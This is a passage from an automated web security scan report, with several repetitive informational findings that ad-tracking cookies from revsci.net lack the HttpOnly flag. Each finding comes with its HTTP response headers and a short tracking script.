rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N/BUnLo4ivqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS1SBx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9eVFn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:50:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N/BUnLo4ivqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS1SBx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9eVFn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:50:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:50:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/252539645.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D0WTbuOuqwzrTh6D07lJMXkAZBhiSC8XdnKccC9ridpZlYwlDrMd+Xsw4jfPzK/1xf0zWwMrA/z4+adSy8AQ+/bPvWVHlEOkSUWbhx4koFoXhdxjg793faLYGuBz9dgMCEDIzrrOaF+82xyu13GX8yqklpeilr7fO5GXUyZ9/JI9p102eUI7O1KiczNpQSIk0ZtC1Vx48kZ0cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+TonH9N3g785XpchwMSTNEkg72LuQq7hJcS8A8P0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:16:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D0WTbuOuqwzrTh6D07lJMXkAZBhiSC8XdnKccC9ridpZlYwlDrMd+Xsw4jfPzK/1xf0zWwMrA/z4+adSy8AQ+/bPvWVHlEOkSUWbhx4koFoXhdxjg793faLYGuBz9dgMCEDIzrrOaF+82xyu13GX8yqklpeilr7fO5GXUyZ9/JI9p102eUI7O1KiczNpQSIk0ZtC1Vx48kZ0cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+TonH9N3g785XpchwMSTNEkg72LuQq7hJcS8A8P0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:16:02 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:16:02 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266352153.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54fwOVkMaFAobUG24cBItVdGihd0sK3hMs6HbnIYcP2I3tgk7tyNj/CzYfV5FqstcqOop1zqPFXKfIvvmEo0ON7M6w6+YxBJfrsIqbws/ZDBnp4g3ZVklyBZNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36bmKM7dx1A/Vxwef83PAeTH8qIcBf02eAyO1/7xFtrS0DhXUOdRHhAzlA0KYq2ET5UVu59BjzK6KOWnK/nEb/SXdvcpSNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:44 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54fwOVkMaFAobUG24cBItVdGihd0sK3hMs6HbnIYcP2I3tgk7tyNj/CzYfV5FqstcqOop1zqPFXKfIvvmEo0ON7M6w6+YxBJfrsIqbws/ZDBnp4g3ZVklyBZNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36bmKM7dx1A/Vxwef83PAeTH8qIcBf02eAyO1/7xFtrS0DhXUOdRHhAzlA0KYq2ET5UVu59BjzK6KOWnK/nEb/SXdvcpSNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:15:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266715150.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfqkDDDA6eA08p566AWsC6dZEToDZUZ7/JkL2T9iF2WdR9KJhTybAZxS4F8a2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFWddAYMSGIntIJ56bP4P6/Yl+5XrH+SP65GfKkcTktT+ixZURa1DGnHu9JHEFB0mc0sF31AINfSJunXxe34XYbmFaIfjesfMWQXpheEvi041VI6cB5PWkN9EEOPhVD6kYISOzHi1mYdZ8NX5Voy+/nUm3e1K+DfKvY3L3ke5rRMvaZZt6BTdOxx6db2mp2hiLwrTkygILbiA5eUJuDXyNvAC52oOVf/ejg6t1LMkqPwWsWmnhyumL/+ztQ44CQzdB/PvH+Kf9vSQMvnX6CdIRf4eqLBaYL9wZ89pCHDj9TA7TN6znKPuazTN1uXnFQh7g+YauJCG0vRJlkLZ2JhTFXPyw3KOca5snkA/tFhkUHVRSZi3Bv+jFnqV1v1Hkj/kayttJKF31X7Ji6YV0ikrpLRZHqRm+rkvb/hVsZFF90TbcJj8HFd45r6m6g7g8ZNWHnfAa/gOp54xSyfsPeY6sWzt6IKQdWUHX7iMDMhesN4RKNyYcM3mb9hJMy/zos8eUq6DzvJAV5vLvpUTI6M7DV8YuWBRq4WHNNo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:05:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfqkDDDA6eA08p566AWsC6dZEToDZUZ7/JkL2T9iF2WdR9KJhTybAZxS4F8a2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFWddAYMSGIntIJ56bP4P6/Yl+5XrH+SP65GfKkcTktT+ixZURa1DGnHu9JHEFB0mc0sF31AINfSJunXxe34XYbmFaIfjesfMWQXpheEvi041VI6cB5PWkN9EEOPhVD6kYISOzHi1mYdZ8NX5Voy+/nUm3e1K+DfKvY3L3ke5rRMvaZZt6BTdOxx6db2mp2hiLwrTkygILbiA5eUJuDXyNvAC52oOVf/ejg6t1LMkqPwWsWmnhyumL/+ztQ44CQzdB/PvH+Kf9vSQMvnX6CdIRf4eqLBaYL9wZ89pCHDj9TA7TN6znKPuazTN1uXnFQh7g+YauJCG0vRJlkLZ2JhTFXPyw3KOca5snkA/tFhkUHVRSZi3Bv+jFnqV1v1Hkj/kayttJKF31X7Ji6YV0ikrpLRZHqRm+rkvb/hVsZFF90TbcJj8HFd45r6m6g7g8ZNWHnfAa/gOp54xSyfsPeY6sWzt6IKQdWUHX7iMDMhesN4RKNyYcM3mb9hJMy/zos8eUq6DzvJAV5vLvpUTI6M7DV8YuWBRq4WHNNo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:05:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:05:43 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266829410.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgpvScH9tFeRMhELpJLSfJyoeffq5ibS0Z4hZAe4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUhJ6UX8rURuWyiJPXLj3B0M2CF0kB3srOQf+cRoMKbq4XH6tE2Dcioboe+cnDDJZgSt6tgeDB7qFfWLRUPsLU7uupkxJoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:53:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgpvScH9tFeRMhELpJLSfJyoeffq5ibS0Z4hZAe4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUhJ6UX8rURuWyiJPXLj3B0M2CF0kB3srOQf+cRoMKbq4XH6tE2Dcioboe+cnDDJZgSt6tgeDB7qFfWLRUPsLU7uupkxJoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:53:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:53:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/271822828.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GjGxMTb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHVwaNKdWI3SWQJ9zzYJE3gOggYzS8l60cF2fThYKZWrEcWW0BvTeT4FW1ruM7/GaXYHlxlcxlY9e55vKxtpoLjzvvQQaHTPh0X0eya3DxMPDEKTB7ClAkJ3WaqRODPcKx/IuH584RkrsmRfc3CFuvdQc0Syy+EOVpga9Cu2Xug1fvFX09UyjpIf1CPZg+MO8wDnyDEevJoubP5q5X3Lq6ZiemknQeXxBEDacfeaEMQXdpBhlOxi8v9qsbVInoJQonM0vTfQQpah4iS4oUHt1+jp8Byyj3g4i4gWPGhmo9uQu30piYpJ6rKG2SBlvK3zJDw2m8WCPhtshtALXAv2bHK8p7f2YFxvlhHegoqbRiuVkn648ssnvenZ8GBjgQycrYza/h6YBb3rWnciO7z0O5BtFcOnuBk0rszDsvXmWGiLJUNhN0PeyhlURoDg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:11:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GjGxMTb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHVwaNKdWI3SWQJ9zzYJE3gOggYzS8l60cF2fThYKZWrEcWW0BvTeT4FW1ruM7/GaXYHlxlcxlY9e55vKxtpoLjzvvQQaHTPh0X0eya3DxMPDEKTB7ClAkJ3WaqRODPcKx/IuH584RkrsmRfc3CFuvdQc0Syy+EOVpga9Cu2Xug1fvFX09UyjpIf1CPZg+MO8wDnyDEevJoubP5q5X3Lq6ZiemknQeXxBEDacfeaEMQXdpBhlOxi8v9qsbVInoJQonM0vTfQQpah4iS4oUHt1+jp8Byyj3g4i4gWPGhmo9uQu30piYpJ6rKG2SBlvK3zJDw2m8WCPhtshtALXAv2bHK8p7f2YFxvlhHegoqbRiuVkn648ssnvenZ8GBjgQycrYza/h6YBb3rWnciO7z0O5BtFcOnuBk0rszDsvXmWGiLJUNhN0PeyhlURoDg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:11:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:11:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/298241288.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxDDLIL4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGGVl/GdrOMZ/Y+D7DfFcJwE0NOQgtTXZ9dBXUlcd9Q/LtscVIqyW2v6s6iEhJeU8h9plWnekIohe7OqAUbNvDCQtVo1G6MP6VyyS5g/+R8CD4MNKTYYCqGMEVIWz+D0TSTE0xZdhpXd5uEGsYPs9a9DXiMU8QmAUwmcjd7W1GD5QQZOLlE8qZfxFeqiNuC1rBBItAl4Lntw6epFmD3xl1j5XMDlVX6aYKz9oKlGfwpIOEBVqqGVszIH728YaXNXBQJH5nKo4LB4ZFQpZu0JgRyk3dLYnNoOEpwwwYhyVv5CzYfdhF5MklDiZU+qfBs8iY3onXUAmhjxJL4K+A0XA8VLf7k4sc/0JZ8J48f0ieKvzBYmvkKhNNBEt+pfLsa64tp+Cq8rP8l9q1ab2Ks+lDPElWMSSTGMEs1zAQP2ma/t6XcuNTy3hG0Buuc42p2xc7IDD4/1U6MzVmWiTrAgBaH0BC9+6OqgKdS3rUQQ867v0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:43:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxDDLIL4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGGVl/GdrOMZ/Y+D7DfFcJwE0NOQgtTXZ9dBXUlcd9Q/LtscVIqyW2v6s6iEhJeU8h9plWnekIohe7OqAUbNvDCQtVo1G6MP6VyyS5g/+R8CD4MNKTYYCqGMEVIWz+D0TSTE0xZdhpXd5uEGsYPs9a9DXiMU8QmAUwmcjd7W1GD5QQZOLlE8qZfxFeqiNuC1rBBItAl4Lntw6epFmD3xl1j5XMDlVX6aYKz9oKlGfwpIOEBVqqGVszIH728YaXNXBQJH5nKo4LB4ZFQpZu0JgRyk3dLYnNoOEpwwwYhyVv5CzYfdhF5MklDiZU+qfBs8iY3onXUAmhjxJL4K+A0XA8VLf7k4sc/0JZ8J48f0ieKvzBYmvkKhNNBEt+pfLsa64tp+Cq8rP8l9q1ab2Ks+lDPElWMSSTGMEs1zAQP2ma/t6XcuNTy3hG0Buuc42p2xc7IDD4/1U6MzVmWiTrAgBaH0BC9+6OqgKdS3rUQQ867v0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:43:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:43:53 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/306033605.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdWFELSWX4cgfi8hl0kZCcw6ceuLt9P2NpiUf/MYlTYoG5t5eHvBNiLT+2/Xfw8sDm5o/dr/lyyqoyewPJyXyn2THfveLvEUUW1Bd8zRg/TVdUvxerT8QtDBYEHnka4DI4frtTQyQAIds+150VrGBN8g6cvpozUNuNqXY3MQ2j16ELBNs9WLdXNDp5Yk9JuCrco7FVu9BCTHbH9rdTRNtiXCHNBoTHfIEHfbB/8ByQ0arGQb+g8WX8PeyjYFloHg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:03:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

